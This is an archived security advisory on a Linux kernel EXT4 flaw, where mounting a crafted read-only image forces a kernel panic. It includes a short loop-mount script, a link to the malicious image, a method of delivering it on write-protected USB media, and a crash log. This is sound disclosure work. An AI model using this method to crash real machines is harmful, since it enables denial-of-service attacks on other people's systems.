what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux Kernel EXT4 Error Handling Denial Of Service

Linux Kernel EXT4 Error Handling Denial Of Service
Posted Nov 1, 2016
Authored by Ralf Spenneberg, Hendrik Schwartke, Sergej Schumilo

Mounting a crafted EXT4 image as read-only leads to a kernel panic. Since the mounting procedure is a privileged operation, an attacker is probably not able to trigger this vulnerability on the commandline. Instead the automatic mounting feature of the GUI via a crafted USB-device is required.

tags | exploit, denial of service, kernel
SHA-256 | 011b753ceacca2ffb6904932ea2a749ae06dce8d32cca4a615dce413d005e946

Linux Kernel EXT4 Error Handling Denial Of Service

Change Mirror Download
OS-S Security Advisory 2016-23
Local DoS: Linux Kernel EXT4 Error Handling (EXT4 calling panic())

Date:
October 31th, 2016
Authors:
Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE:
Not yet assigned
CVSS:
4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Severity:
Critical
Ease of Exploitation:
Trivial
Vulnerability Type:
Error handling leads to conscious panic() call

Abstract:
Mounting a crafted EXT4 image as read-only leads to a kernel panic.
Since the mounting procedure is a privileged operation, an attacker is
probably not able to trigger this vulnerability on the commandline.
Instead the automatic mounting feature of the GUI via a crafted
USB-device is required.

Detailed product description:
We have verified the bug on the following kernel builds:
Ubuntu Server 16.10 (GNU/Linux 4.8.0-22-generic x86_64)
RedHat Kernel 3.10.0-327.18.2.el7.x86_64

Vendor Communication:
We contacted RedHat on May, 03th 2016.
To this day, no security patch was provided by the vendor.
We publish this Security Advisory in accordance with our responsible
disclosure policy.

Reference: https://bugzilla.redhat.com/show_bug.cgi?id=1332506

Proof of Concept:
As a proof of concept, we are providing the image that is causing a
panic() call. For demonstration purposes a script to mount this
filesystem is also attached.

Severity and Ease of Exploitation:
The vulnerability can be easily exploited as a Denial-of-Service
remotely by using a USB-device. In this case the attacker must copy this
image (e.g. using dd) to a device or storage such as a SD-card which can
be set to read-only mode (using the write-protection switch).

Mount-Script:
cp ext4_fs_file /tmp/
mkdir /tmp/a
sudo losetup /dev/loop0 /tmp/ext4_fs_file
sudo mount -o ro /dev/loop0 /tmp/a

Malicious EXT4-Image (BASE64 Encoded):
https://os-s.net/advisories/OSS-2016-23-image


dmesg-Report:
/ # ./mount.sh
[ 11.269750] EXT4-fs (loop0): Unrecognized mount option "" or missing
value
[ 11.278081] EXT4-fs (loop0): failed to parse options in superblock:
[ 11.286825] EXT4-fs: Warning: mounting with data=journal disables
delayed allocation and O_DIRECT support!
[ 11.295852] EXT4-fs warning (device loop0): ext4_fill_super:3568:
fragment/cluster size (0) != block size (1024)
[ 11.304393] EXT4-fs (loop0): ext4_check_descriptors: Checksum for
group 0 failed (58173!=0)
[ 11.317625] EXT4-fs (loop0): revision level too high, forcing
read-only mode
[ 11.327470] EXT4-fs (loop0): orphan cleanup on readonly fs
[ 11.332096] EXT4-fs error (device loop0): ext4_get_group_desc:288:
comm mounter: block_group >= groups_count - block_group = 1023983,
groups_count = 1
[ 11.353372] Kernel panic - not syncing: EXT4-fs (device loop0): panic
forced after error
[ 11.353372]
[ 11.361499] CPU: 0 PID: 143 Comm: mounter Tainted: G OE
4.6.0-rc6 #5
[ 11.369343] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 11.378184] ffff88002155d710 ffff88002103f6f8 ffffffff819fdf81
ffffffffc019e240
[ 11.384350] ffff88002103f7d0 ffff88002103f7c0 ffffffff814643fc
0000000041b58ab3
[ 11.390465] ffffffff82f1fcbb ffffffff81464272 0000000000000000
ffff880000000010
[ 11.396134] Call Trace:
[ 11.398812] [<ffffffff819fdf81>] dump_stack+0x63/0x82
[ 11.410022] [<ffffffff814643fc>] panic+0x18a/0x2ef
[ 11.415285] [<ffffffff81464272>] ? set_ti_thread_flag+0xf/0xf
[ 11.422216] [<ffffffff8166d48c>] ? __sync_dirty_buffer+0x14c/0x1a0
[ 11.427425] [<ffffffffc0104e78>]
ext4_handle_error.part.190+0x298/0x2e0 [ext4]
[ 11.433536] [<ffffffffc0104fc6>] __ext4_error+0x106/0x1b0 [ext4]
[ 11.438436] [<ffffffffc0104ec0>] ?
ext4_handle_error.part.190+0x2e0/0x2e0 [ext4]
[ 11.444580] [<ffffffff8125f36a>] ? vprintk_default+0x5a/0x90
[ 11.449308] [<ffffffff81570fb6>] ? kasan_unpoison_shadow+0x36/0x50
[ 11.459341] [<ffffffff81464823>] ? power_down+0xc4/0xc4
[ 11.463704] [<ffffffff8170752b>] ? proc_alloc_inum+0x8b/0x170
[ 11.468337] [<ffffffff817074a0>] ? __proc_create+0x5a0/0x5a0
[ 11.476158] [<ffffffffc0069cb6>] ext4_get_group_desc+0x1f6/0x2e0 [ext4]
[ 11.481386] [<ffffffffc0103d0c>] ? __ext4_msg+0x13c/0x150 [ext4]
[ 11.486315] [<ffffffffc0077a33>] ext4_read_inode_bitmap+0x23/0x14c0
[ext4]
[ 11.491811] [<ffffffffc007d76f>] ext4_orphan_get+0xff/0x4e0 [ext4]
[ 11.501660] [<ffffffffc0191ffd>] ? ext4_register_sysfs+0x1ad/0x290
[ext4]
[ 11.507700] [<ffffffffc010c9ef>] ?
ext4_register_li_request+0xdf/0x740 [ext4]
[ 11.515257] [<ffffffffc01181e6>] ext4_fill_super+0x8936/0x9ab0 [ext4]
[ 11.521387] [<ffffffffc010f8b0>] ?
ext4_calculate_overhead+0xd00/0xd00 [ext4]
[ 11.532063] [<ffffffff81a29000>] ? pointer+0xa70/0xa70
[ 11.541636] [<ffffffff8157102e>] ? kasan_kmalloc+0x5e/0x70
[ 11.546815] [<ffffffff8156d04b>] ? __kmalloc+0xeb/0x230
[ 11.551595] [<ffffffff814a3604>] ? register_shrinker+0x84/0x1e0
[ 11.558138] [<ffffffff81a2ad28>] ? snprintf+0x88/0xa0
[ 11.562158] [<ffffffff81a2aca0>] ? vsprintf+0x20/0x20
[ 11.566260] [<ffffffff815c8cf0>] ? ns_test_super+0x60/0x60
[ 11.570504] [<ffffffff815cb8a5>] mount_bdev+0x275/0x320
[ 11.574572] [<ffffffffc010f8b0>] ?
ext4_calculate_overhead+0xd00/0xd00 [ext4]
[ 11.586625] [<ffffffffc00cd5e5>] ext4_mount+0x15/0x20 [ext4]
[ 11.591910] [<ffffffff815cce31>] mount_fs+0x81/0x2c0
[ 11.597510] [<ffffffff8161ef5b>] vfs_kern_mount+0x6b/0x330
[ 11.604139] [<ffffffff81626c28>] do_mount+0x428/0x28b0
[ 11.608389] [<ffffffff814c553e>] ? strndup_user+0x4e/0xc0
[ 11.612704] [<ffffffff81626800>] ? copy_mount_string+0x20/0x20
[ 11.623559] [<ffffffff8157102e>] ? kasan_kmalloc+0x5e/0x70
[ 11.629014] [<ffffffff81571352>] ? kasan_slab_alloc+0x12/0x20
[ 11.636190] [<ffffffff815702cf>] ? __kmalloc_track_caller+0xbf/0x210
[ 11.641408] [<ffffffff814c553e>] ? strndup_user+0x4e/0xc0
[ 11.645754] [<ffffffff814c5422>] ? memdup_user+0x42/0x70
[ 11.650056] [<ffffffff81629c45>] SyS_mount+0x95/0xe0
[ 11.653852] [<ffffffff82869a36>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[ 11.666389] Kernel Offset: disabled
[ 11.670125] Rebooting in 1 seconds..

--
OpenSource Training Ralf Spenneberg http://www.os-t.de
Am Bahnhof 3-5 48565 Steinfurt Germany
Fon: +49(0)2552 638 755 Fax: +49(0)2552 638 757
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    18 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    6 Files
  • 28
    May 28th
    12 Files
  • 29
    May 29th
    31 Files
  • 30
    May 30th
    22 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close